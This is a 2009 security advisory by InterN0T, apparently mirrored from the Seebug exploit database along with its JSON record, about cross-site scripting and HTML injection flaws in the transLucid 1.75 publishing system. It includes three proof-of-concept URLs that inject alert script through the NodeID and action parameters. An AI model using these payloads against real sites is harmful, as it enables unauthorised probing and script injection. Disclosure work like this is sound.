Search...

TransLucid 1.75 Multiple Remote Vulnerabilities

2009-06-12T00:00:00

ID SSV:12957
Type seebug
Reporter Root
Modified 2009-06-12T00:00:00

Description

No description provided by source.

                                        
                                            
                                                transLucid - Cross Site Scripting and HTML Injection Vulnerabilities

Version Affected: 1.75 (newest)

Info: transLucidonline is the easy website publishing system with which
anyone can create and maintain web content, in multiple languages and
based on a growing list of ready-made, professional layouts.

Credits: InterN0T (macd3v and MaXe)

External Links:
http://www.pantha.net/


-:: The Advisory ::-

Vulnerable Function / ID Calls:
NodeID &amp; action (vulnerable in both admin and public panels)

Cross Site Scripting: (anyone - this was tested with public mode on)
1)
http://[HOST]/translucid/transLucid_175/?NodeID=&quot;&gt;&lt;script&gt;alert(0)&lt;/script&gt;
2)
http://[HOST]/translucid/transLucid_175/?action=&quot;&gt;&lt;script&gt;alert(0)&lt;/script&gt;
(found by macd3v)
3)
http://[HOST]/translucid/transLucid_175/?admin_section=1&amp;NodeID=&quot;&gt;&lt;script&gt;alert(0)&lt;/script&gt;
-- Number 3 might require moderator or administrative access if public
mode is not turned on.

HTML Injection:
- If public mode is on / chosen, editing the following page-fields will
result in script execution: Title &amp; Url

Adding a new page can result in HTML Injection too. (Parent &amp; Child
pages were fully tested.)

Affected Sites by HTML Injection: (there will most likely be a lot more.)
http://[HOST]/translucid/transLucid_175/?action=switchto_editmode
-- In the admin panel &quot;&gt; needs to be prepended most likely in order to
execute the injection.
--=-- Switching the theme to Developer can result in HTML Injection if
there is any injected.

-:: Solution ::-
Regular expression match and / or bad characters conversion rocks!

Conclusion:
Easy to install and use, but the code should have been reviewed long ago.

Reference:
http://forum.intern0t.net/intern0t-advisories/1122-intern0t-translucid-1-75-multiple-vulnerabilities.html

Disclosure Information:
- Vulnerabilities found, researched and confirmed between 5th to 10th June.
- Advisory finished and published on InterN0T the 12th June.
- Vendor and Buqtraq (SecurityFocus) contacted the 12th June.


All of the best,
MaXe

# sebug.net

JSON Vulners Source

Initial Source

{"sourceData": "\n transLucid - Cross Site Scripting and HTML Injection Vulnerabilities\n\nVersion Affected: 1.75 (newest)\n\nInfo: transLucidonline is the easy website publishing system with which\nanyone can create and maintain web content, in multiple languages and\nbased on a growing list of ready-made, professional layouts.\n\nCredits: InterN0T (macd3v and MaXe)\n\nExternal Links:\nhttp://www.pantha.net/\n\n\n-:: The Advisory ::-\n\nVulnerable Function / ID Calls:\nNodeID & action (vulnerable in both admin and public panels)\n\nCross Site Scripting: (anyone - this was tested with public mode on)\n1)\nhttp://[HOST]/translucid/transLucid_175/?NodeID="><script>alert(0)</script>\n2)\nhttp://[HOST]/translucid/transLucid_175/?action="><script>alert(0)</script>\n(found by macd3v)\n3)\nhttp://[HOST]/translucid/transLucid_175/?admin_section=1&NodeID="><script>alert(0)</script>\n-- Number 3 might require moderator or administrative access if public\nmode is not turned on.\n\nHTML Injection:\n- If public mode is on / chosen, editing the following page-fields will\nresult in script execution: Title & Url\n\nAdding a new page can result in HTML Injection too. (Parent & Child\npages were fully tested.)\n\nAffected Sites by HTML Injection: (there will most likely be a lot more.)\nhttp://[HOST]/translucid/transLucid_175/?action=switchto_editmode\n-- In the admin panel "> needs to be prepended most likely in order to\nexecute the injection.\n--=-- Switching the theme to Developer can result in HTML Injection if\nthere is any injected.\n\n-:: Solution ::-\nRegular expression match and / or bad characters conversion rocks!\n\nConclusion:\nEasy to install and use, but the code should have been reviewed long ago.\n\nReference:\nhttp://forum.intern0t.net/intern0t-advisories/1122-intern0t-translucid-1-75-multiple-vulnerabilities.html\n\nDisclosure Information:\n- Vulnerabilities found, researched and confirmed between 5th to 10th June.\n- Advisory finished and published on InterN0T the 12th June.\n- Vendor and Buqtraq (SecurityFocus) contacted the 12th June.\n\n\nAll of the best,\nMaXe\n\n# sebug.net\n\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-12957", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-12957", "type": "seebug", "viewCount": 3, "references": [], "lastseen": "2017-11-19T18:48:54", "published": "2009-06-12T00:00:00", "cvelist": [], "id": "SSV:12957", "enchantments_done": [], "modified": "2009-06-12T00:00:00", "title": "TransLucid 1.75 Multiple Remote Vulnerabilities", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645499149}}